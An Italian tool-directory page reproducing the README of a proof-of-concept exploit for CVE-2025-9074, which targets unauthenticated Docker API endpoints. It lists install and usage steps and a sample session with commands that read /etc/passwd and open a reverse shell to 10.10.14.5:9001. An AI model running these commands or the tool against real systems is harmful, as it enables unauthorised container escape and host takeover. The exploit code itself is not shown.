Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc-2025-9074 — PoC Docker API CVE-2025-9074 (Proof-Of-Concept). Un framework di exploitation sofisticato per CVE-2025-9074, che prende di mira endpoint Docker API non autenticati con una shell di comando interattiva integrata. | Kitploit
Strumenti/GitHubGitHub/xwpdx0/poc-2025-9074
Sicurezza dell'Infrastruttura CloudEscalation di PrivilegiScanner di VulnerabilitàSicurezza dei ContenitoriFramework di ExploitExploitPost-ExploitPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHub
418 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
xwpdx0/poc-2025-9074

poc-2025-9074

PoC Docker API CVE-2025-9074 (Proof-Of-Concept). Un framework di exploitation sofisticato per CVE-2025-9074, che prende di mira endpoint Docker API non autenticati con una shell di comando interattiva integrata.

Vedi Repository

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Prova di concetto)

Un sofisticato framework di exploitation per CVE-2025-9074, che prende di mira endpoint Docker API non autenticati, dotato di una shell interattiva integrata per l'esecuzione dei comandi.

Language Platform License

Panoramica

Questo strumento automatizza lo sfruttamento di istanze Docker API esposte senza autenticazione, consentendo la piena creazione di container e l'esecuzione di comandi sull'host di destinazione. Lo strumento include una shell interattiva personalizzata per operazioni post-exploitation senza interruzioni.

Nota: questa è un'implementazione PoC personalizzata. Non ho scoperto CVE-2025-9074.

Dimostrazione

Sfruttamento iniziale

Exploitation Process

Rilevamento automatico delle vulnerabilità, pull dell'immagine, creazione e inizializzazione del container

Esecuzione interattiva dei comandi

Command Execution

Shell post-exploitation con capacità di esecuzione dei comandi

Funzionalità principali

  • Scansione automatica delle vulnerabilità dell'API Docker
  • Distribuzione di container con montaggio del filesystem host
  • Shell interattiva post-exploitation
  • Interfaccia per l'esecuzione remota dei comandi
  • Modulo per la distribuzione di reverse shell
  • Output del terminale a colori per una migliore visibilità

Installazione

  1. Clona il repository
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. Compila il codice
root@kitploit:~
gcc poc.c -o poc-2025-9074

oppure puoi scaricare il binario dalla sezione Releases

Utilizzo

root@kitploit:~
./poc-2025-9074

Target predefinito

Esegui contro il target predefinito (127.0.0.1:2375):

root@kitploit:~
./poc-2025-9074

Target personalizzato

Specifica un endpoint Docker API personalizzato:

Custom Target

Shell interattiva

Dopo lo sfruttamento riuscito, una shell interattiva fornisce i seguenti comandi:

ComandoDescrizione
cmd <command>Esegui comandi arbitrari all'interno del container

Esempi di utilizzo

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

Dettagli sulla vulnerabilità

CVE-2025-9074 colpisce le istanze Docker con endpoint API esposti privi di meccanismi di autenticazione adeguati. Questa errata configurazione consente accessi non autorizzati al daemon Docker, permettendo di:

  • Creare container arbitrari
  • Accedere al filesystem host tramite bind mount
  • Ottenere opportunità di escalation dei privilegi
  • Eseguire codice in remoto

Disclaimer legale

Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.

  • Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test
  • L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge
  • L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo strumento
  • Gli utenti sono gli unici responsabili del rispetto delle leggi e delle normative applicabili

Autore

xwpd (@xwpdx0)

Licenza

MIT License - Vedere il file LICENSE per i dettagli


Solo per scopi di divulgazione responsabile e ricerca sulla sicurezza.

Scarica lo strumento
revshell <ip> <port>
Distribuisci una reverse shell verso un listener specificato
infoMostra le informazioni correnti su container e target
exitTermina la sessione interattiva